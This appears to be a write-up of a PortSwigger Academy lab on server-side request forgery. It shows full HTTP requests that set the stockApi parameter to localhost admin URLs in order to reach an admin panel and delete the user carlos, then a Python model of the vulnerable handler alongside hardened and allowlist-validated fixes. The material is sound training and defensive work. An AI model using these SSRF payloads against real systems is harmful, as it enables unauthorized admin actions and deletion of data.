
PortSwigger Web Security Academy lab: Basic SSRF against the local server

Solution

Open the lab's product page and use the "Check stock" feature, capturing the resulting request in Burp Suite (or any intercepting proxy):

https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net/product?productId=1

Edit stockApi

The stock checker sends a POST to /product/stock whose stockApi parameter carries the full URL the back end should fetch. Change it from the URL-encoded original, stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1 (decoded: http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1), to http://localhost/admin. The server issues that request itself, so it reaches the admin interface, which only accepts connections from the local machine. Burp Repeater recalculates Content-Length for the shorter body:
---
POST /product/stock HTTP/2
Host: 0aa200ef04c8083a83b11428002000cf.web-security-academy.net
Cookie: session=EUT2OhAA0xXkxLMoOcPqVOsS3OMaF1Ax
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http://localhost/admin

Delete user carlos through the admin interface

The response to the previous request contains the admin page, and its delete link for carlos is /admin/delete?username=carlos. Send that URL through the same stockApi parameter, again to the stock endpoint, so the deletion request originates from localhost:
---
https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net/product/stock
---
POST /product/stock HTTP/2
Host: 0aa200ef04c8083a83b11428002000cf.web-security-academy.net
Cookie: session=EUT2OhAA0xXkxLMoOcPqVOsS3OMaF1Ax
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http://localhost/admin/delete?username=carlos

Solved
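As an added example, not part of the original lab or this writeup, the following Python models the lab's stock-check endpoint: the vulnerable handler that fetches whatever URL arrives in stockApi, the preferred fix that never accepts a URL at all, and a strict allowlist validator for cases where a URL must be accepted. INTERNAL_SERVICES, backend_fetch and all function names are constructed stand-ins for the shop's back-end HTTP client and the hosts it can reach (the stock API and the localhost-only admin interface); nothing here touches the network.

```python
"""Model of the lab's stock-check endpoint: vulnerable handler next to hardened ones.

Constructed example. INTERNAL_SERVICES and backend_fetch stand in for the shop's
server-side HTTP client and the hosts it can reach.
"""
import ipaddress
from urllib.parse import urlsplit

STOCK_API_BASE = "http://stock.weliketoshop.net:8080/product/stock/check"

# Constructed map of URL -> response body for what the back end can reach.
INTERNAL_SERVICES = {
    STOCK_API_BASE + "?productId=1&storeId=1": "42",
    "http://localhost/admin": '<a href="/admin/delete?username=carlos">Delete carlos</a>',
    "http://localhost/admin/delete?username=carlos": "User carlos deleted",
}


def backend_fetch(url: str) -> str:
    """Stand-in for the server-side HTTP client (constructed, no network access)."""
    return INTERNAL_SERVICES.get(url, "404 Not Found")


def vulnerable_stock_check(stock_api: str) -> str:
    """The lab's bug: fetch whatever URL the client put in the stockApi parameter."""
    return backend_fetch(stock_api)


def hardened_stock_check(product_id: int, store_id: int) -> str:
    """Preferred fix: accept only the IDs and build the back-end URL server-side."""
    url = f"{STOCK_API_BASE}?productId={int(product_id)}&storeId={int(store_id)}"
    return backend_fetch(url)


ALLOWED_HOSTS = {"stock.weliketoshop.net"}
ALLOWED_PORTS = {8080}
ALLOWED_PATH_PREFIX = "/product/stock/check"


def is_allowed_stock_api(url: str, resolve=None) -> bool:
    """Defence in depth when a URL must be accepted: allowlist scheme, host, port and
    path, reject userinfo tricks, and optionally confirm the host does not resolve to
    a loopback/private address. `resolve` is a hostname -> IP-string callable the
    caller supplies (e.g. socket.gethostbyname); it is a parameter so the check can
    run offline."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme != "http":
        return False
    if parts.username is not None or parts.password is not None:
        return False  # e.g. http://stock.weliketoshop.net@localhost/admin
    if parts.hostname not in ALLOWED_HOSTS:
        return False
    if (port or 80) not in ALLOWED_PORTS:
        return False
    if not parts.path.startswith(ALLOWED_PATH_PREFIX):
        return False
    if resolve is not None:
        try:
            ip = ipaddress.ip_address(resolve(parts.hostname))
        except ValueError:
            return False
        if (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_reserved or ip.is_unspecified):
            return False
    return True


def guarded_stock_check(stock_api: str, resolve=None) -> str:
    """Vulnerable handler wrapped with the allowlist check."""
    if not is_allowed_stock_api(stock_api, resolve):
        return "400 Bad Request: stockApi not allowed"
    return backend_fetch(stock_api)


if __name__ == "__main__":
    # The two payloads from the walkthrough against the vulnerable handler...
    print(vulnerable_stock_check("http://localhost/admin"))
    print(vulnerable_stock_check("http://localhost/admin/delete?username=carlos"))
    # ...and against the guarded one.
    print(guarded_stock_check("http://localhost/admin"))
    print(guarded_stock_check(STOCK_API_BASE + "?productId=1&storeId=1"))
```

The allowlist is the fallback, not the fix: hardened_stock_check removes the attacker-controlled URL entirely, which is what the lab's own remediation advice amounts to. If a URL must be accepted, the resolved address check is only meaningful when the outgoing request then connects to that same pinned IP; resolving once for the check and again for the fetch leaves a DNS rebinding window.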